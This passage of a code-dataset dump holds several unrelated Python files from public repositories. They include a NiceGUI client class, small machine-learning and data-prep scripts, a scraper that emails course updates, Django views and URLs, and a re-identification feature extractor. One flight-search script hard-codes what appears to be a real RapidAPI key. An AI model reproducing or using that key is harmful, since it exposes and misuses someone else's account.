self.environ: Optional[Dict[str, Any]] = None\n self.shared = shared\n self.on_air = False\n self._disconnect_task: Optional[asyncio.Task] = None\n\n with Element('q-layout', _client=self).props('view=\"hhh lpr fff\"').classes('nicegui-layout') as self.layout:\n with Element('q-page-container') as self.page_container:\n with Element('q-page'):\n self.content = Element('div').classes('nicegui-content')\n\n self.waiting_javascript_commands: Dict[str, Any] = {}\n\n self.head_html = ''\n self.body_html = ''\n\n self.page = page\n\n self.connect_handlers: List[Union[Callable[..., Any], Awaitable]] = []\n self.disconnect_handlers: List[Union[Callable[..., Any], Awaitable]] = []\n\n self._temporary_socket_id: Optional[str] = None\n\n @property\n def is_auto_index_client(self) -> bool:\n \"\"\"Return True if this client is the auto-index client.\"\"\"\n return self is self.auto_index_client\n\n @property\n def ip(self) -> Optional[str]:\n \"\"\"Return the IP address of the client, or None if the client is not connected.\"\"\"\n return self.environ['asgi.scope']['client'][0] if self.environ else None # pylint: disable=unsubscriptable-object\n\n @property\n def has_socket_connection(self) -> bool:\n \"\"\"Return True if the client is connected, False otherwise.\"\"\"\n return self.environ is not None\n\n def __enter__(self):\n self.content.__enter__()\n return self\n\n def __exit__(self, *_):\n self.content.__exit__()\n\n def build_response(self, request: Request, status_code: int = 200) -> Response:\n \"\"\"Build a FastAPI response for the client.\"\"\"\n prefix = request.headers.get('X-Forwarded-Prefix', request.scope.get('root_path', ''))\n elements = json.dumps({\n id: element._to_dict() for id, element in self.elements.items() # pylint: disable=protected-access\n })\n socket_io_js_query_params = {**core.app.config.socket_io_js_query_params, 'client_id': self.id}\n vue_html, vue_styles, vue_scripts, imports, js_imports = generate_resources(prefix, self.elements.values())\n return templates.TemplateResponse('index.html', {\n 'request': request,\n 'version': __version__,\n 'elements': elements.replace('&', '&')\n .replace('<', '<')\n .replace('>', '>')\n .replace('`', '`'),\n 'head_html': self.head_html,\n 'body_html': '\\n' + self.body_html + '\\n' + '\\n'.join(vue_html),\n 'vue_scripts': '\\n'.join(vue_scripts),\n 'imports': json.dumps(imports),\n 'js_imports': '\\n'.join(js_imports),\n 'quasar_config': json.dumps(core.app.config.quasar_config),\n 'title': self.page.resolve_title(),\n 'viewport': self.page.resolve_viewport(),\n 'favicon_url': get_favicon_url(self.page, prefix),\n 'dark': str(self.page.resolve_dark()),\n 'language': self.page.resolve_language(),\n 'prefix': prefix,\n 'tailwind': core.app.config.tailwind,\n 'prod_js': core.app.config.prod_js,\n 'socket_io_js_query_params': socket_io_js_query_params,\n 'socket_io_js_extra_headers': core.app.config.socket_io_js_extra_headers,\n 'socket_io_js_transports': core.app.config.socket_io_js_transports,\n }, status_code, {'Cache-Control': 'no-store', 'X-NiceGUI-Content': 'page'})\n\n async def connected(self, timeout: float = 3.0, check_interval: float = 0.1) -> None:\n \"\"\"Block execution until the client is connected.\"\"\"\n self.is_waiting_for_connection = True\n deadline = time.time() + timeout\n while not self.has_socket_connection:\n if time.time() > deadline:\n raise TimeoutError(f'No connection after {timeout} seconds')\n await asyncio.sleep(check_interval)\n self.is_waiting_for_connection = False\n\n async def disconnected(self, check_interval: float = 0.1) -> None:\n \"\"\"Block execution until the client disconnects.\"\"\"\n if not self.has_socket_connection:\n await self.connected()\n self.is_waiting_for_disconnect = True\n while self.id in self.instances:\n await asyncio.sleep(check_interval)\n self.is_waiting_for_disconnect = False\n\n def run_javascript(self, code: str, *,\n respond: Optional[bool] = None, # DEPRECATED\n timeout: float = 1.0, check_interval: float = 0.01) -> AwaitableResponse:\n \"\"\"Execute JavaScript on the client.\n\n The client connection must be established before this method is called.\n You can do this by `await client.connected()` or register a callback with `client.on_connect(...)`.\n\n If the function is awaited, the result of the JavaScript code is returned.\n Otherwise, the JavaScript code is executed without waiting for a response.\n\n :param code: JavaScript code to run\n :param timeout: timeout in seconds (default: `1.0`)\n :param check_interval: interval in seconds to check for a response (default: `0.01`)\n\n :return: AwaitableResponse that can be awaited to get the result of the JavaScript code\n \"\"\"\n if respond is True:\n log.warning('The \"respond\" argument of run_javascript() has been removed. '\n 'Now the method always returns an AwaitableResponse that can be awaited. '\n 'Please remove the \"respond=True\" argument.')\n if respond is False:\n raise ValueError('The \"respond\" argument of run_javascript() has been removed. '\n 'Now the method always returns an AwaitableResponse that can be awaited. '\n 'Please remove the \"respond=False\" argument and call the method without awaiting.')\n\n request_id = str(uuid.uuid4())\n target_id = self._temporary_socket_id or self.id\n\n def send_and_forget():\n outbox.enqueue_message('run_javascript', {'code': code}, target_id)\n\n async def send_and_wait():\n outbox.enqueue_message('run_javascript', {'code': code, 'request_id': request_id}, target_id)\n deadline = time.time() + timeout\n while request_id not in self.waiting_javascript_commands:\n if time.time() > deadline:\n raise TimeoutError('JavaScript did not respond in time')\n await asyncio.sleep(check_interval)\n return self.waiting_javascript_commands.pop(request_id)\n\n return AwaitableResponse(send_and_forget, send_and_wait)\n\n def open(self, target: Union[Callable[..., Any], str], new_tab: bool = False) -> None:\n \"\"\"Open a new page in the client.\"\"\"\n path = target if isinstance(target, str) else self.page_routes[target]\n outbox.enqueue_message('open', {'path': path, 'new_tab': new_tab}, self.id)\n\n def download(self, url: str, filename: Optional[str] = None) -> None:\n \"\"\"Download a file from the given URL.\"\"\"\n outbox.enqueue_message('download', {'url': url, 'filename': filename}, self.id)\n\n def on_connect(self, handler: Union[Callable[..., Any], Awaitable]) -> None:\n \"\"\"Register a callback to be called when the client connects.\"\"\"\n self.connect_handlers.append(handler)\n\n def on_disconnect(self, handler: Union[Callable[..., Any], Awaitable]) -> None:\n \"\"\"Register a callback to be called when the client disconnects.\"\"\"\n self.disconnect_handlers.append(handler)\n\n def handle_handshake(self) -> None:\n \"\"\"Cancel pending disconnect task and invoke connect handlers.\"\"\"\n if self._disconnect_task:\n self._disconnect_task.cancel()\n self._disconnect_task = None\n for t in self.connect_handlers:\n self.safe_invoke(t)\n for t in core.app._connect_handlers: # pylint: disable=protected-access\n self.safe_invoke(t)\n\n def handle_disconnect(self) -> None:\n \"\"\"Wait for the browser to reconnect; invoke disconnect handlers if it doesn't.\"\"\"\n async def handle_disconnect() -> None:\n if self.page.reconnect_timeout is not None:\n delay = self.page.reconnect_timeout\n else:\n delay = core.app.config.reconnect_timeout # pylint: disable=protected-access\n await asyncio.sleep(delay)\n for t in self.disconnect_handlers:\n self.safe_invoke(t)\n for t in core.app._disconnect_handlers: # pylint: disable=protected-access\n self.safe_invoke(t)\n if not self.shared:\n self.delete()\n self._disconnect_task = background_tasks.create(handle_disconnect())\n\n def handle_event(self, msg: Dict) -> None:\n \"\"\"Forward an event to the corresponding element.\"\"\"\n with self:\n sender = self.elements.get(msg['id'])\n if sender:\n msg['args'] = [None if arg is None else json.loads(arg) for arg in msg.get('args', [])]\n if len(msg['args']) == 1:\n msg['args'] = msg['args'][0]\n sender._handle_event(msg) # pylint: disable=protected-access\n\n def handle_javascript_response(self, msg: Dict) -> None:\n \"\"\"Store the result of a JavaScript command.\"\"\"\n self.waiting_javascript_commands[msg['request_id']] = msg['result']\n\n def safe_invoke(self, func: Union[Callable[..., Any], Awaitable]) -> None:\n \"\"\"Invoke the potentially async function in the client context and catch any exceptions.\"\"\"\n try:\n if isinstance(func, Awaitable):\n async def func_with_client():\n with self:\n await func\n background_tasks.create(func_with_client())\n else:\n with self:\n result = func(self) if len(inspect.signature(func).parameters) == 1 else func()\n if helpers.is_coroutine_function(func):\n async def result_with_client():\n with self:\n await result\n background_tasks.create(result_with_client())\n except Exception as e:\n core.app.handle_exception(e)\n\n def remove_elements(self, elements: Iterable[Element]) -> None:\n \"\"\"Remove the given elements from the client.\"\"\"\n binding.remove(elements, Element)\n element_ids = [element.id for element in elements]\n for element_id in element_ids:\n del self.elements[element_id]\n for element in elements:\n element._handle_delete() # pylint: disable=protected-access\n element._deleted = True # pylint: disable=protected-access\n outbox.enqueue_delete(element)\n\n def remove_all_elements(self) -> None:\n \"\"\"Remove all elements from the client.\"\"\"\n self.remove_elements(self.elements.values())\n\n def delete(self) -> None:\n \"\"\"Delete a client and all its elements.\n\n If the global clients dictionary does not contain the client, its elements are still removed and a KeyError is raised.\n Normally this should never happen, but has been observed (see #1826).\n \"\"\"\n self.remove_all_elements()\n del Client.instances[self.id]\n\n @contextmanager\n def individual_target(self, socket_id: str) -> Iterator[None]:\n \"\"\"Use individual socket ID while in this context.\n\n This context is useful for limiting messages from the shared auto-index page to a single client.\n \"\"\"\n self._temporary_socket_id = socket_id\n yield\n self._temporary_socket_id = None\n\n @classmethod\n async def prune_instances(cls) -> None:\n \"\"\"Prune stale clients in an endless loop.\"\"\"\n while True:\n try:\n stale_clients = [\n client\n for client in cls.instances.values()\n if not client.shared and not client.has_socket_connection and client.created < time.time() - 60.0\n ]\n for client in stale_clients:\n client.delete()\n except Exception:\n # NOTE: make sure the loop doesn't crash\n log.exception('Error while pruning clients')\n await asyncio.sleep(10)\n","repo_name":"zauberzeug/nicegui","sub_path":"nicegui/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":14052,"program_lang":"python","lang":"en","doc_type":"code","stars":5894,"dataset":"github-code","pt":"5"} +{"seq_id":"74381359511","text":"import numpy as np\n\ndef gaussian(x, mu, var):\n p = 1/(2 * np.pi * var)**(x.size/2) * np.exp(-np.linalg.norm(mu-x)**2 / (2 * var))\n return p\n\n# problem parameters\np = np.array([0.5, 0.5])\nmu = np.array([-3, 2])\nvar = np.array([4, 4])\nx = np.array([0.2, -0.9, -1, 1.2, 1.8])\n\n# Calculation of E step\np1 = np.array([p[0] * gaussian(xi, mu[0], var[0]) for xi in x])\np2 = np.array([p[1] * gaussian(xi, mu[1], var[1]) for xi in x])\np_x_sum = p1 + p2\np1 /= p_x_sum\np2 /= p_x_sum\n\nprint('Posterior probabilities for the 5 points created by component 1 is:', p1)\n\n# Update step - M Step\np_stack = np.stack((p1, p2), -1)\np_cluster_sum = np.sum(p_stack, 0)\n\nmu = x @ p_stack / p_cluster_sum\np = p_cluster_sum / p1.size\nvar = np.sum(p_stack * (mu.reshape(1,-1) - x.reshape(-1,1))**2, 0) / (x[0].size * p_cluster_sum)\n\nprint('Updated cluster 1 parameters: mu: ', mu[0], ', p: ', p[0], ', var: ', var[0])\n\n\n\n\n","repo_name":"omryblum/MIT-ML-686-2022","sub_path":"CourseCalculation/Lecture_14_Calculations.py","file_name":"Lecture_14_Calculations.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28830530816","text":"import json\nimport numpy as np\nfrom keras.callbacks import TensorBoard\nfrom data_prep import gen_cosine_amp_for_supervised as gen_testdata\nfrom data_prep import print_data, series_to_supervised\nfrom ufcnn import ufcnn_model_concat\n\nsequence_length = 64 # same as in Roni Mittelman's paper - this is 2 times 32 - a line in Ronis input contains 33 numbers, but 1 is time and is omitted\nfeatures = 1 # guess changed Ernst 20160301\nnb_filter = 150 # same as in Roni Mittelman's paper\nfilter_length = 5 # same as in Roni Mittelman's paper\noutput_dim = 1\nbatch_size = 128\n\n#cos, expected = gen_testdata(sequence_length*100)\n\nwith open('./ecto.json') as data_file:\n data = json.load(data_file)\n\nsell = np.array([float(d['sell']) for d in data])\nsell = np.insert(np.diff(sell), 0, 0)\nprint(sell[0:5])\nsell = sell.reshape(-1, 1)\nsell = series_to_supervised(sell)\n\ntrain = sell.values[:, 0]\nprint(train[0:5])\ntrain = train.reshape(-1, 1, 1)\ntrain = train[::-1]\n\n\nexpected = sell.values[:, 1]\nprint(expected[0:5])\nexpected = expected.reshape(-1, 1, 1)\nexpected = expected[::-1]\n\n\n","repo_name":"Winehorn/GW2-DeepPost","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39672220834","text":"import ssl\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport datetime as dt\n\n\ndef get_updates():\n URL = \"https://www.ouka.fi/oulu/villavictor/ajankohtaista\"\n # request the URL and parse the JSON\n page = requests.get(URL)\n page.raise_for_status() # raise exception if invalid response\n\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n # Extraction, Clean up and Date formatting\n date_span = soup.find_all(\n 'span', {'class': 'metadata-entry metadata-publish-date'})\n publish_date_txt = [span.get_text().strip() for span in date_span]\n publish_date = [dt.datetime.strptime(\n dtm, '%d.%m.%Y').date() for dtm in publish_date_txt]\n\n # Extraction and Clean up of posts and link\n post_span = soup.find_all('header', {'class': 'ouka-ap-title-list-title'})\n posts = [span.get_text().strip() for span in post_span]\n links = [x.find('a', href=True)['href'] for x in post_span]\n\n df = pd.DataFrame(list(zip(publish_date, posts, links)),\n columns=['publish_date', 'Posts', 'Links'])\n\n # Extracting the posts that were published today\n df = df.loc[df.publish_date == dt.date.today()]\n df.reset_index(drop=True, inplace=True)\n\n matches = [\"alkeis1\", \"alkeis 1\", \"alkeiskurssi 1\"]\n if len(df) != 0:\n for i in range(len(df)):\n title = df['Posts'][i].lower()\n # return(any(x in title for x in matches))\n yesNo = any(x in title for x in matches)\n if yesNo == 1:\n return (title, df['Links'][i])\n else:\n return 0\n else:\n return(-1)\n\n\nif __name__ == \"__main__\":\n sender_email = os.environ['MAIL_USER']\n password = os.environ['MAIL_PASS']\n\n receiver_email = sender_email # I'm sending it to myself\n # receiver_list = ['email_1@email.com', 'email_2@gmail.com', email_3@mail.com]\n\n msg = MIMEMultipart()\n msg['From'] = sender_email\n\n # check for updates on the website\n latestUpdate = get_updates()\n\n if latestUpdate == -1:\n msg['To'] = receiver_email\n msg['Subject'] = 'No new posts today'\n html = \"\"\"\\\n \n \n

Hello!!
\n The page does not have any new posts. Enjoy your day.
\n

\n \n \n \"\"\"\n elif latestUpdate == 0:\n msg['To'] = receiver_email\n msg['Subject'] = 'Nothing important to report today'\n html = 'Hello!! New post but NOT about Alkeis 1'\n else:\n postTitle = latestUpdate[0].title()\n postLink = latestUpdate[1]\n # msg['To'] = ','.join(receiver_list) # To send to multiple\n msg['To'] = receiver_email\n msg['Subject'] = 'New Post on Villa Victor'\n html = \"\"\"\\\n \n \n

Hello!!
\n A new update has been posted on Villa Victor Website about Alkeis 1 course.
\n {postTitle}\n

\n \n \n \"\"\".format(**locals())\n\n msg_content = MIMEText(html, 'html')\n msg.attach(msg_content)\n\n # Create secure connection with server and send email\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", 465, context=context) as server:\n server.login(sender_email, password)\n server.sendmail(sender_email, msg['To'].split(\",\"), msg.as_string())\n","repo_name":"avinashmalla/Scrape-and-Email","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29469352116","text":"# One-away - There are three types of edits that can be performed on strings. Insert a character, removed a character, or replaced a character\n# Given two strings, write a function to check if they are one edit away\n# Example Pale, Ple yields ture\n# Example Pale, Bake yields false\n\ndef testString(string1,string2):\n if len(string1)==len(string2):\n count=0\n for i in range(len(string1)):\n if string1[i]!=string2[i]:\n count+=1\n if count==2: #If they strings are the same length and more than two characters are different, it cannot be a one away\n return False\n return True\n elif abs(len(string1)-len(string2))==1:\n if len(string1)-len(string2)==-1:\n large_string=string2\n small_string=string1\n else:\n large_string=string1\n small_string=string2\n if string1[len(string1)-1]==string2[len(string2)-1] and string1[0]!=string2[0]:\n test = large_string[1:len(large_string)]==small_string #trim first character of large string\n return test\n if string1[0]==string2[0] and string1[len(string1)-1]!=string2[len(string2)-1]:\n test = large_string[0:len(large_string)-1]==small_string #trim last character of large string\n return test\n if string1[0]==string2[0] and string1[len(string1)-1]==string2[len(string2)-1]:\n j=1\n for i in large_string[1:len(large_string)-1]:\n if i!=small_string[j]:\n large_string = large_string[:j]+large_string[j+1:]\n test = large_string == small_string\n return test\n j+=1\n\n\nif testString(\"test\",\"tnot\"):\n print(\"It is a one away\")\nelse:\n print(\"It is not\")","repo_name":"LoganNissenson/CodingPractice","sub_path":"Problem 1.5.py","file_name":"Problem 1.5.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74012407192","text":"from __future__ import print_function\nimport argparse\nimport time\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nfrom data_loader import SYSUData, RegDBData, LLCMData, TestData\nfrom data_manager import *\nfrom eval_metrics import eval_sysu, eval_regdb, eval_llcm\nfrom model import embed_net\nfrom utils import *\nimport pdb\nimport scipy.io\n\nparser = argparse.ArgumentParser(description='PyTorch Cross-Modality Training')\nparser.add_argument('--dataset', default='llcm', help='dataset name: regdb or sysu]')\nparser.add_argument('--lr', default=0.1 , type=float, help='learning rate, 0.00035 for adam')\nparser.add_argument('--optim', default='sgd', type=str, help='optimizer')\nparser.add_argument('--arch', default='resnet50', type=str, help='network baseline:resnet18 or resnet50')\nparser.add_argument('--resume', '-r', default='llcm_agw_p4_n8_lr_0.1_seed_0_best.t', type=str, help='resume from checkpoint')\nparser.add_argument('--test-only', action='store_true', help='test only')\nparser.add_argument('--model_path', default='save_model/', type=str, help='model save path')\nparser.add_argument('--save_epoch', default=20, type=int, metavar='s', help='save model every 10 epochs')\nparser.add_argument('--log_path', default='log/', type=str, help='log save path')\nparser.add_argument('--vis_log_path', default='log/vis_log/', type=str, help='log save path')\nparser.add_argument('--workers', default=4, type=int, metavar='N', help='number of data loading workers (default: 4)')\nparser.add_argument('--img_w', default=144, type=int, metavar='imgw', help='img width')\nparser.add_argument('--img_h', default=288, type=int, metavar='imgh', help='img height')\nparser.add_argument('--batch-size', default=8, type=int, metavar='B', help='training batch size')\nparser.add_argument('--test-batch', default=64, type=int, metavar='tb', help='testing batch size')\nparser.add_argument('--method', default='agw', type=str, metavar='m', help='method type: base or agw')\nparser.add_argument('--margin', default=0.3, type=float, metavar='margin', help='triplet loss margin')\nparser.add_argument('--num_pos', default=4, type=int, help='num of pos per identity in each modality')\nparser.add_argument('--trial', default=1, type=int, metavar='t', help='trial (only for RegDB dataset)')\nparser.add_argument('--seed', default=0, type=int, metavar='t', help='random seed')\nparser.add_argument('--gpu', default='0', type=str, help='gpu device ids for CUDA_VISIBLE_DEVICES')\nparser.add_argument('--mode', default='all', type=str, help='all or indoor for sysu')\nparser.add_argument('--tvsearch', action='store_true', help='whether thermal to visible search on RegDB')\nargs = parser.parse_args()\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\ndataset = args.dataset\nif dataset == 'sysu':\n data_path = './Datasets/SYSU-MM01/'\n n_class = 395\n test_mode = [1, 2]\nelif dataset =='regdb':\n data_path = './Datasets/RegDB/'\n n_class = 206\n test_mode = [2, 1]\nelif dataset =='llcm':\n data_path = './Datasets/LLCM/'\n n_class = 713\n test_mode = [1, 2] #[2, 1]: VIS to IR; [1, 2]: IR to VIS\n \ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nbest_acc = 0 # best test accuracy\nstart_epoch = 0 \npool_dim = 2048\nprint('==> Building model..')\nnet = embed_net(n_class, dataset, arch=args.arch)\nnet.to(device) \ncudnn.benchmark = True\n\ncheckpoint_path = args.model_path\n\nif args.method =='id':\n criterion = nn.CrossEntropyLoss()\n criterion.to(device)\n\nprint('==> Loading data..')\n# Data loading code\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])\ntransform_train = transforms.Compose([\n transforms.ToPILImage(),\n transforms.RandomCrop((args.img_h,args.img_w)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n])\n\ntransform_test = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize((args.img_h,args.img_w)),\n transforms.ToTensor(),\n normalize,\n])\n\nend = time.time()\n\ndef extract_gall_feat(gall_loader):\n net.eval()\n print ('Extracting Gallery Feature...')\n start = time.time()\n ptr = 0\n gall_feat_pool = np.zeros((ngall, pool_dim))\n gall_feat_fc = np.zeros((ngall, pool_dim))\n with torch.no_grad():\n for batch_idx, (input, label ) in enumerate(gall_loader):\n batch_num = input.size(0)\n input = Variable(input.cuda())\n feat_pool, feat_fc = net(input, input, test_mode[0])\n gall_feat_pool[ptr:ptr+batch_num,: ] = feat_pool.detach().cpu().numpy()\n gall_feat_fc[ptr:ptr+batch_num,: ] = feat_fc.detach().cpu().numpy()\n ptr = ptr + batch_num\n print('Extracting Time:\\t {:.3f}'.format(time.time()-start))\n return gall_feat_pool, gall_feat_fc\n \ndef extract_query_feat(query_loader):\n net.eval()\n print ('Extracting Query Feature...')\n start = time.time()\n ptr = 0\n query_feat_pool = np.zeros((nquery, pool_dim))\n query_feat_fc = np.zeros((nquery, pool_dim))\n with torch.no_grad():\n for batch_idx, (input, label ) in enumerate(query_loader):\n batch_num = input.size(0)\n input = Variable(input.cuda())\n feat_pool, feat_fc = net(input, input, test_mode[1])\n query_feat_pool[ptr:ptr+batch_num,: ] = feat_pool.detach().cpu().numpy()\n query_feat_fc[ptr:ptr+batch_num,: ] = feat_fc.detach().cpu().numpy()\n ptr = ptr + batch_num \n print('Extracting Time:\\t {:.3f}'.format(time.time()-start))\n return query_feat_pool, query_feat_fc\n\n\ndef process_llcm(img_dir, mode = 1):\n if mode== 1:\n input_data_path = os.path.join(data_path, 'idx/test_vis.txt')\n elif mode ==2:\n input_data_path = os.path.join(data_path, 'idx/test_nir.txt')\n \n with open(input_data_path) as f:\n data_file_list = open(input_data_path, 'rt').read().splitlines()\n file_image = [img_dir + '/' + s.split(' ')[0] for s in data_file_list]\n file_label = [int(s.split(' ')[1]) for s in data_file_list]\n file_cam = [int(s.split('c0')[1][0]) for s in data_file_list]\n \n return file_image, np.array(file_label), np.array(file_cam)\n\n \nif dataset == 'llcm':\n\n print('==> Resuming from checkpoint..')\n if len(args.resume) > 0:\n model_path = checkpoint_path + args.resume\n # model_path = checkpoint_path + 'llcm_agw_p4_n8_lr_0.1_seed_0_best.t'\n if os.path.isfile(model_path):\n print('==> loading checkpoint {}'.format(args.resume))\n checkpoint = torch.load(model_path)\n net.load_state_dict(checkpoint['net'])\n print('==> loaded checkpoint {} (epoch {})'\n .format(args.resume, checkpoint['epoch']))\n else:\n print('==> no checkpoint found at {}'.format(args.resume))\n\n # testing set\n query_img, query_label, query_cam = process_llcm(data_path, mode=test_mode[1])\n gall_img, gall_label, gall_cam = process_llcm(data_path, mode=test_mode[0])\n\n nquery = len(query_label)\n ngall = len(gall_label)\n print(\"Dataset statistics:\")\n print(\" ------------------------------\")\n print(\" subset | # ids | # images\")\n print(\" ------------------------------\")\n print(\" query | {:5d} | {:8d}\".format(len(np.unique(query_label)), nquery))\n print(\" gallery | {:5d} | {:8d}\".format(len(np.unique(gall_label)), ngall))\n print(\" ------------------------------\")\n\n queryset = TestData(query_img, query_label, transform=transform_test, img_size=(args.img_w, args.img_h))\n query_loader = data.DataLoader(queryset, batch_size=args.test_batch, shuffle=False, num_workers=4)\n\n trial_gallset = TestData(gall_img, gall_label, transform=transform_test, img_size=(args.img_w, args.img_h))\n trial_gall_loader = data.DataLoader(trial_gallset, batch_size=args.test_batch, shuffle=False, num_workers=4)\n\n print('Data Loading Time:\\t {:.3f}'.format(time.time() - end))\n\n query_feat_pool, query_feat_fc = extract_query_feat(query_loader)\n gall_feat_pool, gall_feat_fc = extract_gall_feat(trial_gall_loader)\n\n result = {'gallery_f':gall_feat_fc,'gallery_label':gall_label,'gallery_cam':gall_cam,'query_f':query_feat_fc,'query_label':query_label,'query_cam':query_cam}\n scipy.io.savemat('tsne.mat',result)\n","repo_name":"ZYK100/LLCM","sub_path":"Visualization/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"5"} +{"seq_id":"21893233239","text":"c = input()\na = ['monday','tuesday','wednsday','thursday','friday']\nb = ['saturday','sunday']\nfor i in range(len(a)):\n if(a[i] == c):\n print(\"no\")\n break\n elif(b[i] == c):\n print(\"yes\")\n break\n","repo_name":"saineeharika7/Basic-JS","sub_path":"stringscodekata/days.py","file_name":"days.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23986462211","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('dashboard/', views.homepage, name='dashboard'),\n path('result/', views.results, name='result'),\n path('overview/', views.profile, name='overview'),\n path('new/', views.addpatient, name='addPatient'),\n path('', views.signin, name='sign-in'),\n path('petscan/', views.petscan, name='pet')\n \n\n # path('rujul', views.rujul, name='rujul'),\n]","repo_name":"iamawesome24/DiseasePred","sub_path":"Dashboard/dash_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36737366089","text":"from gen_input import gen_random_array\n\ninput_arr = gen_random_array(100)\n\n# Time complexity: O(N^2)\n# Space complexity: O(N)\n\nprint(f\"Before sorting: {input_arr}\")\n\ndef run_insert(arr, a):\n insert_pos = -1\n for i, num in enumerate(arr):\n if num >= a:\n insert_pos = i\n break\n if insert_pos == -1:\n insert_pos = len(arr)\n arr.insert(insert_pos, a)\n return arr\n\ndef insertion_sort(arr):\n current_arr = []\n for a in arr:\n current_arr = run_insert(current_arr, a)\n return current_arr\n\noutput_arr = insertion_sort(input_arr)\nprint(f\"After sorting: {output_arr}\")\n\n\n","repo_name":"Lawlietgit/Algorithms","sub_path":"Sorting_algos/inserting_sorting.py","file_name":"inserting_sorting.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6197540052","text":"from django.conf.urls import url\n \n# from module import class\n# from app.controllers.usercontroller import Usercontroller\nfrom app.controllers.api import usercontroller\nfrom app.controllers.api import postcontroller\nfrom app.controllers import homecontroller\n\nurlpatterns = [\n url(r'^home/index$', homecontroller.index),\n url(r'^home/register$', homecontroller.register),\n url(r'^home/profile$', homecontroller.profile),\n url(r'^api/user/register/$', usercontroller.register),\n url(r'^home/login$', homecontroller.login),\n url(r'^api/user/login/$', usercontroller.login),\n url(r'^api/user/logout/$', usercontroller.logout),\n url(r'^api/user/detect_login/$', usercontroller.detect_login),\n url(r'^api/post/post_editing/$', postcontroller.post_editing),\n url(r'^api/post/post_details/$', postcontroller.post_details),\n url(r'^home/post_editing$', homecontroller.post_editing),\n url(r'^home/myposts$', homecontroller.myposts),\n url(r'^api/post/getuserposts$', postcontroller.getuserposts),\n url(r'^home/post_details$', homecontroller.post_details),\n]","repo_name":"illovey/forum","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25112904517","text":"import requests\nimport json\nurl = \"https://priceline-com-provider.p.rapidapi.com/v2/flight/departures\"\n\nquerystring = {\"departure_date\":\"2022-02-06\",\"sid\":\"iSiX639\",\"adults\":\"1\",\"origin_airport_code\":\"IST\",\"cabin_class\":\"first\",\"destination_city_id\":\"NYC\"}\n\nheaders = {\n 'x-rapidapi-host': \"priceline-com-provider.p.rapidapi.com\",\n 'x-rapidapi-key': \"a17d6697f9msh416ba0f0266c920p1a2803jsne3d403bd5310\"\n }\n\nresponse = requests.request(\"GET\", url, headers=headers, params=querystring)\n\n\ndata = json.loads(response.content) \nwith open('flights.json', 'w', encoding='utf-8') as f:\n json.dump(data, f, ensure_ascii=False, indent=4)","repo_name":"haxhex/NoSQL-Flight-System","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13728402188","text":"from rest_framework import status\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.response import Response\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import api_view\nfrom rest_framework.permissions import IsAuthenticated\nfrom .serializers import StudentSerializer,StudentBulkUploadSerializer, StudentHostelSerializer,StudentRelationContactSerializer, StudentStatusSerializer, StudentsCartSerializer\nfrom .models import Student,StudentBulkUpload, StudentHostelService, StudentNationlityCartInfo, StudentStatus,StudentRelationContact\nfrom django.db.models import Q\nfrom rest_framework.pagination import PageNumberPagination\nfrom .filters import StudentFilter\nfrom django_filters.utils import translate_validation\nimport ast\nfrom results.models import Result,Course\nfrom departments.models import Subject \nfrom accounts.models import User\n\n\nclass StudentViews(viewsets.ModelViewSet):\n\n \"\"\"view for students\"\"\"\n\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n # permission_classes = (IsAuthenticated,)\n \n\n def list(self, request):\n search = request.query_params.get('search')\n order = request.query_params.get('order')\n paginator = PageNumberPagination()\n paginator.page_size=5\n first_name=''\n if search==None:\n search=''\n if order == None:\n first_name = 'first_name'\n elif order == 'desc':\n first_name = '-first_name'\n \n student = Student.objects.distinct().filter(\n Q(first_name__icontains=search) |\n Q(last_name__icontains=search) |\n Q(score__icontains=search) \n ).order_by(first_name)\n \n studentfilter = StudentFilter(request.GET, queryset=student)\n pages = paginator.paginate_queryset(studentfilter.qs, request)\n \n serializer = StudentSerializer(pages, many=True)\n return paginator.get_paginated_response(serializer.data)\n\n def retrieve(self, request, pk=None):\n student = get_object_or_404(self.queryset, pk=pk)\n serializer 